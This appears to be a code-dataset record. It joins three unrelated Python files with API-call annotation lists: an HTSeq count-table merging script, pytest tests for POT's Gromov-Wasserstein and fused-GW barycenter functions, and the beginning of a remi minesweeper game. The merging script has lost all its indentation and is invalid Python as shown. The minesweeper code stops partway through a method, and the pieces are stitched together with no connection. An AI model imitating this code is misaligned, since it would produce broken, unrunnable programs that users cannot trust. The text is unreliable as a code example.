#python 2.7.5
#catcount.py
#Version 1. <NAME>, Feb 2017
#Contact, <NAME>, <EMAIL>
#############################################
# Concatenate count tables from HTSeq-count #
#############################################
import csv
import sys
import os
import copy
import argparse
import pandas as pd
def tempPathCheck(args):
absOutDir = os.path.abspath(args.outDir)
if not os.path.isdir(absOutDir):
os.makedirs(absOutDir)
return absOutDir
def getbasename(path):
base = os.path.splitext(os.path.basename(path))[0]
return base
def fetchrows(indexlist,filepath,args):
''' Add rownames to indexlist, make unique '''
newrows = list()
with open(filepath) as f:
c = csv.reader(f, delimiter='\t')
for line in c:
if args.featureNames:
if line[0].startswith(args.featureNames):
newrows.append(line[0])
else:
newrows.append(line[0])
oldrows = copy.deepcopy(indexlist)
catlist = oldrows + newrows
uniq_rows = set(catlist)
return list(uniq_rows)
def makeblankdf(args):
index = list()
columns = list()
for sample in args.inFiles:
setcount = 0
for split_sample in sample.split(','):
setcount += 1
if setcount == 1:
columns = columns + [getbasename(split_sample)]
index = fetchrows(index,split_sample,args)
elif setcount > 1:
index = fetchrows(index,split_sample,args)
index.sort()
columns.sort()
df = pd.DataFrame(index=index, columns=columns)
df = df.fillna(0).astype(int)
return df
def readcounts(colID,filepath,args):
rowcounts = dict()
with open(filepath) as f:
c = csv.reader(f, delimiter='\t')
for line in c:
if args.featureNames:
if line[0].startswith(args.featureNames):
rowcounts[line[0]] = line[1]
else:
rowcounts[line[0]] = line[1]
counts_df = pd.DataFrame.from_dict(rowcounts, orient='index', dtype='int64').astype(int)
counts_df.columns = [colID]
return counts_df
def populatetable(mastertable,filelist,args):
filledtable = copy.deepcopy(mastertable)
for sample in filelist:
setcount = 0
for merge_sample in sample.split(','):
setcount += 1
if setcount == 1:
sample_name = getbasename(merge_sample)
temp_df = readcounts(sample_name,merge_sample,args)
filledtable = filledtable.add(temp_df, fill_value=0)
elif setcount > 1:
temp_df = readcounts(sample_name,merge_sample,args)
filledtable = filledtable.add(temp_df, fill_value=0)
return filledtable.astype(int)
def main(args):
if args.inFiles is None:
sys.exit('No input files provided')
if args.outDir:
outdir = tempPathCheck(args)
outpath = os.path.join(outdir,args.outName)
else:
outpath = args.outName
mastertable = makeblankdf(args)
filledtable = populatetable(mastertable,args.inFiles,args)
outopen = open(outpath, 'w')
filledtable.to_csv(path_or_buf=outopen, sep='\t', header=True, index=True, line_terminator='\n')
outopen.close()
if __name__== '__main__':
###Argument handling.
parser = argparse.ArgumentParser(
description='Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names.',
prog='catcount')
parser.add_argument("-i", "--inFiles",
type=str,
default=None,
nargs='+',
help="List of count files or pairs of files.")
parser.add_argument("-o", "--outName",
type=str,
default= "CatCounts.txt",
help="Write concatenated count table to this file.")
parser.add_argument("-d", "--outDir",
type=str,
default= None,
help="Directory for output file to be written to.")
parser.add_argument("-n", "--featureNames",
type=str,
default= None,
help="Keep feature names that start with this string. i.e. 'ge' will return 'gene_001'")
args = parser.parse_args()
main(args);
|
[
"pandas.DataFrame",
"copy.deepcopy",
"os.path.abspath",
"csv.reader",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.basename",
"os.path.isdir",
"pandas.DataFrame.from_dict",
"os.path.join",
"sys.exit"
] |
[((363, 391), 'os.path.abspath', 'os.path.abspath', (['args.outDir'], {}), '(args.outDir)\n', (378, 391), False, 'import os\n'), ((893, 917), 'copy.deepcopy', 'copy.deepcopy', (['indexlist'], {}), '(indexlist)\n', (906, 917), False, 'import copy\n'), ((1382, 1424), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'index', 'columns': 'columns'}), '(index=index, columns=columns)\n', (1394, 1424), True, 'import pandas as pd\n'), ((1952, 1978), 'copy.deepcopy', 'copy.deepcopy', (['mastertable'], {}), '(mastertable)\n', (1965, 1978), False, 'import copy\n'), ((2936, 3152), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names."""', 'prog': '"""catcount"""'}), "(description=\n 'Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names.'\n , prog='catcount')\n", (2959, 3152), False, 'import argparse\n'), ((400, 424), 'os.path.isdir', 'os.path.isdir', (['absOutDir'], {}), '(absOutDir)\n', (413, 424), False, 'import os\n'), ((428, 450), 'os.makedirs', 'os.makedirs', (['absOutDir'], {}), '(absOutDir)\n', (439, 450), False, 'import os\n'), ((698, 727), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '"""\t"""'}), "(f, delimiter='\\t')\n", (708, 727), False, 'import csv\n'), ((1558, 1587), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '"""\t"""'}), "(f, delimiter='\\t')\n", (1568, 1587), False, 'import csv\n'), ((2469, 2504), 'sys.exit', 'sys.exit', (['"""No input files provided"""'], {}), "('No input files provided')\n", (2477, 2504), False, 'import sys\n'), ((2567, 2601), 'os.path.join', 'os.path.join', (['outdir', 'args.outName'], {}), '(outdir, args.outName)\n', (2579, 2601), False, 'import os\n'), ((518, 540), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (534, 540), False, 'import os\n'), ((1766, 1830), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['rowcounts'], {'orient': '"""index"""', 'dtype': '"""int64"""'}), "(rowcounts, orient='index', dtype='int64')\n", (1788, 1830), True, 'import pandas as pd\n')]
|
"""Tests for module gromov """
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: MIT License
import numpy as np
import ot
def test_gromov():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=4)
xt = xs[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
G = ot.gromov.gromov_wasserstein(C1, C2, p, q, 'square_loss', verbose=True)
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
Id = (1 / (1.0 * n_samples)) * np.eye(n_samples, n_samples)
np.testing.assert_allclose(
G, np.flipud(Id), atol=1e-04)
gw, log = ot.gromov.gromov_wasserstein2(C1, C2, p, q, 'kl_loss', log=True)
gw_val = ot.gromov.gromov_wasserstein2(C1, C2, p, q, 'kl_loss', log=False)
G = log['T']
np.testing.assert_allclose(gw, 0, atol=1e-1, rtol=1e-1)
np.testing.assert_allclose(gw, gw_val, atol=1e-1, rtol=1e-1) # cf log=False
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_entropic_gromov():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=42)
xt = xs[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
G = ot.gromov.entropic_gromov_wasserstein(
C1, C2, p, q, 'square_loss', epsilon=5e-4, verbose=True)
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
gw, log = ot.gromov.entropic_gromov_wasserstein2(
C1, C2, p, q, 'kl_loss', epsilon=1e-2, log=True)
G = log['T']
np.testing.assert_allclose(gw, 0, atol=1e-1, rtol=1e-1)
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_gromov_barycenter():
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
Cb = ot.gromov.gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'square_loss', # 5e-4,
max_iter=100, tol=1e-3,
verbose=True)
np.testing.assert_allclose(Cb.shape, (n_samples, n_samples))
Cb2 = ot.gromov.gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'kl_loss', # 5e-4,
max_iter=100, tol=1e-3)
np.testing.assert_allclose(Cb2.shape, (n_samples, n_samples))
def test_gromov_entropic_barycenter():
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
Cb = ot.gromov.entropic_gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'square_loss', 2e-3,
max_iter=100, tol=1e-3,
verbose=True)
np.testing.assert_allclose(Cb.shape, (n_samples, n_samples))
Cb2 = ot.gromov.entropic_gromov_barycenters(n_samples, [C1, C2],
[ot.unif(ns), ot.unif(nt)
], ot.unif(n_samples), [.5, .5],
'kl_loss', 2e-3,
max_iter=100, tol=1e-3)
np.testing.assert_allclose(Cb2.shape, (n_samples, n_samples))
def test_fgw():
n_samples = 50 # nb samples
mu_s = np.array([0, 0])
cov_s = np.array([[1, 0], [0, 1]])
xs = ot.datasets.make_2D_samples_gauss(n_samples, mu_s, cov_s, random_state=42)
xt = xs[::-1].copy()
ys = np.random.randn(xs.shape[0], 2)
yt = ys[::-1].copy()
p = ot.unif(n_samples)
q = ot.unif(n_samples)
C1 = ot.dist(xs, xs)
C2 = ot.dist(xt, xt)
C1 /= C1.max()
C2 /= C2.max()
M = ot.dist(ys, yt)
M /= M.max()
G, log = ot.gromov.fused_gromov_wasserstein(M, C1, C2, p, q, 'square_loss', alpha=0.5, log=True)
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence fgw
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence fgw
Id = (1 / (1.0 * n_samples)) * np.eye(n_samples, n_samples)
np.testing.assert_allclose(
G, np.flipud(Id), atol=1e-04) # cf convergence gromov
fgw, log = ot.gromov.fused_gromov_wasserstein2(M, C1, C2, p, q, 'square_loss', alpha=0.5, log=True)
G = log['T']
np.testing.assert_allclose(fgw, 0, atol=1e-1, rtol=1e-1)
# check constratints
np.testing.assert_allclose(
p, G.sum(1), atol=1e-04) # cf convergence gromov
np.testing.assert_allclose(
q, G.sum(0), atol=1e-04) # cf convergence gromov
def test_fgw_barycenter():
np.random.seed(42)
ns = 50
nt = 60
Xs, ys = ot.datasets.make_data_classif('3gauss', ns, random_state=42)
Xt, yt = ot.datasets.make_data_classif('3gauss2', nt, random_state=42)
ys = np.random.randn(Xs.shape[0], 2)
yt = np.random.randn(Xt.shape[0], 2)
C1 = ot.dist(Xs)
C2 = ot.dist(Xt)
n_samples = 3
X, C = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], [ot.unif(ns), ot.unif(nt)], [.5, .5], 0.5,
fixed_structure=False, fixed_features=False,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
xalea = np.random.randn(n_samples, 2)
init_C = ot.dist(xalea, xalea)
X, C = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], ps=[ot.unif(ns), ot.unif(nt)], lambdas=[.5, .5], alpha=0.5,
fixed_structure=True, init_C=init_C, fixed_features=False,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
init_X = np.random.randn(n_samples, ys.shape[1])
X, C, log = ot.gromov.fgw_barycenters(n_samples, [ys, yt], [C1, C2], [ot.unif(ns), ot.unif(nt)], [.5, .5], 0.5,
fixed_structure=False, fixed_features=True, init_X=init_X,
p=ot.unif(n_samples), loss_fun='square_loss',
max_iter=100, tol=1e-3, log=True)
np.testing.assert_allclose(C.shape, (n_samples, n_samples))
np.testing.assert_allclose(X.shape, (n_samples, ys.shape[1]))
|
[
"ot.unif",
"numpy.random.seed",
"numpy.eye",
"ot.datasets.make_data_classif",
"numpy.random.randn",
"ot.dist",
"ot.gromov.entropic_gromov_wasserstein",
"numpy.testing.assert_allclose",
"ot.gromov.fused_gromov_wasserstein",
"ot.gromov.fused_gromov_wasserstein2",
"numpy.flipud",
"ot.gromov.entropic_gromov_wasserstein2",
"numpy.array",
"ot.gromov.gromov_wasserstein2",
"ot.datasets.make_2D_samples_gauss",
"ot.gromov.gromov_wasserstein"
] |
[((250, 266), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (258, 266), True, 'import numpy as np\n'), ((280, 306), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (288, 306), True, 'import numpy as np\n'), ((319, 392), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(4)'}), '(n_samples, mu_s, cov_s, random_state=4)\n', (352, 392), False, 'import ot\n'), ((432, 450), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (439, 450), False, 'import ot\n'), ((460, 478), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (467, 478), False, 'import ot\n'), ((491, 506), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (498, 506), False, 'import ot\n'), ((517, 532), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (524, 532), False, 'import ot\n'), ((586, 657), 'ot.gromov.gromov_wasserstein', 'ot.gromov.gromov_wasserstein', (['C1', 'C2', 'p', 'q', '"""square_loss"""'], {'verbose': '(True)'}), "(C1, C2, p, q, 'square_loss', verbose=True)\n", (614, 657), False, 'import ot\n'), ((1028, 1092), 'ot.gromov.gromov_wasserstein2', 'ot.gromov.gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'log': '(True)'}), "(C1, C2, p, q, 'kl_loss', log=True)\n", (1057, 1092), False, 'import ot\n'), ((1109, 1174), 'ot.gromov.gromov_wasserstein2', 'ot.gromov.gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'log': '(False)'}), "(C1, C2, p, q, 'kl_loss', log=False)\n", (1138, 1174), False, 'import ot\n'), ((1202, 1255), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, 0, atol=0.1, rtol=0.1)\n', (1228, 1255), True, 'import numpy as np\n'), ((1265, 1323), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', 'gw_val'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, gw_val, atol=0.1, rtol=0.1)\n', (1291, 1323), True, 'import numpy as np\n'), ((1635, 1651), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (1643, 1651), True, 'import numpy as np\n'), ((1665, 1691), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (1673, 1691), True, 'import numpy as np\n'), ((1704, 1778), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(42)'}), '(n_samples, mu_s, cov_s, random_state=42)\n', (1737, 1778), False, 'import ot\n'), ((1818, 1836), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (1825, 1836), False, 'import ot\n'), ((1846, 1864), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (1853, 1864), False, 'import ot\n'), ((1877, 1892), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (1884, 1892), False, 'import ot\n'), ((1903, 1918), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (1910, 1918), False, 'import ot\n'), ((1972, 2073), 'ot.gromov.entropic_gromov_wasserstein', 'ot.gromov.entropic_gromov_wasserstein', (['C1', 'C2', 'p', 'q', '"""square_loss"""'], {'epsilon': '(0.0005)', 'verbose': '(True)'}), "(C1, C2, p, q, 'square_loss', epsilon=\n 0.0005, verbose=True)\n", (2009, 2073), False, 'import ot\n'), ((2306, 2398), 'ot.gromov.entropic_gromov_wasserstein2', 'ot.gromov.entropic_gromov_wasserstein2', (['C1', 'C2', 'p', 'q', '"""kl_loss"""'], {'epsilon': '(0.01)', 'log': '(True)'}), "(C1, C2, p, q, 'kl_loss', epsilon=\n 0.01, log=True)\n", (2344, 2398), False, 'import ot\n'), ((2431, 2484), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['gw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(gw, 0, atol=0.1, rtol=0.1)\n', (2457, 2484), True, 'import numpy as np\n'), ((2776, 2836), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (2805, 2836), False, 'import ot\n'), ((2851, 2912), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (2880, 2912), False, 'import ot\n'), ((2925, 2936), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (2932, 2936), False, 'import ot\n'), ((2947, 2958), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (2954, 2958), False, 'import ot\n'), ((3362, 3422), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb.shape', '(n_samples, n_samples)'], {}), '(Cb.shape, (n_samples, n_samples))\n', (3388, 3422), True, 'import numpy as np\n'), ((3755, 3816), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb2.shape', '(n_samples, n_samples)'], {}), '(Cb2.shape, (n_samples, n_samples))\n', (3781, 3816), True, 'import numpy as np\n'), ((3903, 3963), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (3932, 3963), False, 'import ot\n'), ((3978, 4039), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (4007, 4039), False, 'import ot\n'), ((4052, 4063), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (4059, 4063), False, 'import ot\n'), ((4074, 4085), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (4081, 4085), False, 'import ot\n'), ((4540, 4600), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb.shape', '(n_samples, n_samples)'], {}), '(Cb.shape, (n_samples, n_samples))\n', (4566, 4600), True, 'import numpy as np\n'), ((4975, 5036), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['Cb2.shape', '(n_samples, n_samples)'], {}), '(Cb2.shape, (n_samples, n_samples))\n', (5001, 5036), True, 'import numpy as np\n'), ((5108, 5124), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (5116, 5124), True, 'import numpy as np\n'), ((5138, 5164), 'numpy.array', 'np.array', (['[[1, 0], [0, 1]]'], {}), '([[1, 0], [0, 1]])\n', (5146, 5164), True, 'import numpy as np\n'), ((5177, 5251), 'ot.datasets.make_2D_samples_gauss', 'ot.datasets.make_2D_samples_gauss', (['n_samples', 'mu_s', 'cov_s'], {'random_state': '(42)'}), '(n_samples, mu_s, cov_s, random_state=42)\n', (5210, 5251), False, 'import ot\n'), ((5292, 5323), 'numpy.random.randn', 'np.random.randn', (['xs.shape[0]', '(2)'], {}), '(xs.shape[0], 2)\n', (5307, 5323), True, 'import numpy as np\n'), ((5361, 5379), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (5368, 5379), False, 'import ot\n'), ((5389, 5407), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (5396, 5407), False, 'import ot\n'), ((5420, 5435), 'ot.dist', 'ot.dist', (['xs', 'xs'], {}), '(xs, xs)\n', (5427, 5435), False, 'import ot\n'), ((5446, 5461), 'ot.dist', 'ot.dist', (['xt', 'xt'], {}), '(xt, xt)\n', (5453, 5461), False, 'import ot\n'), ((5515, 5530), 'ot.dist', 'ot.dist', (['ys', 'yt'], {}), '(ys, yt)\n', (5522, 5530), False, 'import ot\n'), ((5565, 5657), 'ot.gromov.fused_gromov_wasserstein', 'ot.gromov.fused_gromov_wasserstein', (['M', 'C1', 'C2', 'p', 'q', '"""square_loss"""'], {'alpha': '(0.5)', 'log': '(True)'}), "(M, C1, C2, p, q, 'square_loss', alpha=\n 0.5, log=True)\n", (5599, 5657), False, 'import ot\n'), ((6043, 6136), 'ot.gromov.fused_gromov_wasserstein2', 'ot.gromov.fused_gromov_wasserstein2', (['M', 'C1', 'C2', 'p', 'q', '"""square_loss"""'], {'alpha': '(0.5)', 'log': '(True)'}), "(M, C1, C2, p, q, 'square_loss', alpha=\n 0.5, log=True)\n", (6078, 6136), False, 'import ot\n'), ((6159, 6213), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['fgw', '(0)'], {'atol': '(0.1)', 'rtol': '(0.1)'}), '(fgw, 0, atol=0.1, rtol=0.1)\n', (6185, 6213), True, 'import numpy as np\n'), ((6465, 6483), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (6479, 6483), True, 'import numpy as np\n'), ((6528, 6588), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss"""', 'ns'], {'random_state': '(42)'}), "('3gauss', ns, random_state=42)\n", (6557, 6588), False, 'import ot\n'), ((6603, 6664), 'ot.datasets.make_data_classif', 'ot.datasets.make_data_classif', (['"""3gauss2"""', 'nt'], {'random_state': '(42)'}), "('3gauss2', nt, random_state=42)\n", (6632, 6664), False, 'import ot\n'), ((6677, 6708), 'numpy.random.randn', 'np.random.randn', (['Xs.shape[0]', '(2)'], {}), '(Xs.shape[0], 2)\n', (6692, 6708), True, 'import numpy as np\n'), ((6719, 6750), 'numpy.random.randn', 'np.random.randn', (['Xt.shape[0]', '(2)'], {}), '(Xt.shape[0], 2)\n', (6734, 6750), True, 'import numpy as np\n'), ((6763, 6774), 'ot.dist', 'ot.dist', (['Xs'], {}), '(Xs)\n', (6770, 6774), False, 'import ot\n'), ((6785, 6796), 'ot.dist', 'ot.dist', (['Xt'], {}), '(Xt)\n', (6792, 6796), False, 'import ot\n'), ((7164, 7223), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (7190, 7223), True, 'import numpy as np\n'), ((7229, 7290), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (7255, 7290), True, 'import numpy as np\n'), ((7306, 7335), 'numpy.random.randn', 'np.random.randn', (['n_samples', '(2)'], {}), '(n_samples, 2)\n', (7321, 7335), True, 'import numpy as np\n'), ((7350, 7371), 'ot.dist', 'ot.dist', (['xalea', 'xalea'], {}), '(xalea, xalea)\n', (7357, 7371), False, 'import ot\n'), ((7751, 7810), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (7777, 7810), True, 'import numpy as np\n'), ((7816, 7877), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (7842, 7877), True, 'import numpy as np\n'), ((7894, 7933), 'numpy.random.randn', 'np.random.randn', (['n_samples', 'ys.shape[1]'], {}), '(n_samples, ys.shape[1])\n', (7909, 7933), True, 'import numpy as np\n'), ((8326, 8385), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['C.shape', '(n_samples, n_samples)'], {}), '(C.shape, (n_samples, n_samples))\n', (8352, 8385), True, 'import numpy as np\n'), ((8391, 8452), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['X.shape', '(n_samples, ys.shape[1])'], {}), '(X.shape, (n_samples, ys.shape[1]))\n', (8417, 8452), True, 'import numpy as np\n'), ((908, 936), 'numpy.eye', 'np.eye', (['n_samples', 'n_samples'], {}), '(n_samples, n_samples)\n', (914, 936), True, 'import numpy as np\n'), ((984, 997), 'numpy.flipud', 'np.flipud', (['Id'], {}), '(Id)\n', (993, 997), True, 'import numpy as np\n'), ((3148, 3166), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (3155, 3166), False, 'import ot\n'), ((3596, 3614), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (3603, 3614), False, 'import ot\n'), ((4302, 4320), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (4309, 4320), False, 'import ot\n'), ((4801, 4819), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (4808, 4819), False, 'import ot\n'), ((5897, 5925), 'numpy.eye', 'np.eye', (['n_samples', 'n_samples'], {}), '(n_samples, n_samples)\n', (5903, 5925), True, 'import numpy as np\n'), ((5973, 5986), 'numpy.flipud', 'np.flipud', (['Id'], {}), '(Id)\n', (5982, 5986), True, 'import numpy as np\n'), ((3080, 3091), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (3087, 3091), False, 'import ot\n'), ((3093, 3104), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (3100, 3104), False, 'import ot\n'), ((3527, 3538), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (3534, 3538), False, 'import ot\n'), ((3540, 3551), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (3547, 3551), False, 'import ot\n'), ((4225, 4236), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (4232, 4236), False, 'import ot\n'), ((4238, 4249), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (4245, 4249), False, 'import ot\n'), ((4723, 4734), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (4730, 4734), False, 'import ot\n'), ((4736, 4747), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (4743, 4747), False, 'import ot\n'), ((6888, 6899), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (6895, 6899), False, 'import ot\n'), ((6901, 6912), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (6908, 6912), False, 'import ot\n'), ((7053, 7071), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (7060, 7071), False, 'import ot\n'), ((7640, 7658), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (7647, 7658), False, 'import ot\n'), ((8011, 8022), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (8018, 8022), False, 'import ot\n'), ((8024, 8035), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (8031, 8035), False, 'import ot\n'), ((8200, 8218), 'ot.unif', 'ot.unif', (['n_samples'], {}), '(n_samples)\n', (8207, 8218), False, 'import ot\n'), ((7447, 7458), 'ot.unif', 'ot.unif', (['ns'], {}), '(ns)\n', (7454, 7458), False, 'import ot\n'), ((7460, 7471), 'ot.unif', 'ot.unif', (['nt'], {}), '(nt)\n', (7467, 7471), False, 'import ot\n')]
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import random
import threading
import remi.gui as gui
from remi import start, App
class Cell(gui.TableItem):
"""
Represent a cell in the minefield map
"""
def __init__(self, width, height, x, y, game):
super(Cell, self).__init__('')
self.set_size(width, height)
self.x = x
self.y = y
self.has_mine = False
self.state = 0 # unknown - doubt - flag
self.opened = False
self.nearest_mine = 0 # number of mines adjacent with this cell
self.game = game
self.style['font-weight'] = 'bold'
self.style['text-align'] = 'center'
self.style['background-size'] = 'contain'
if ((x + y) % 2) > 0:
self.style['background-color'] = 'rgb(255,255,255)'
else:
self.style['background-color'] = 'rgb(245,245,240)'
self.oncontextmenu.do(self.on_right_click, js_stop_propagation=True, js_prevent_default=True)
self.onclick.do(self.check_mine)
def on_right_click(self, widget):
""" Here with right click the change of cell is changed """
if self.opened:
return
self.state = (self.state + 1) % 3
self.set_icon()
self.game.check_if_win()
def check_mine(self, widget, notify_game=True):
if self.state == 1:
return
if self.opened:
return
self.opened = True
if self.has_mine and notify_game:
self.game.explosion(self)
self.set_icon()
return
if notify_game:
self.game.no_mine(self)
self.set_icon()
def set_icon(self):
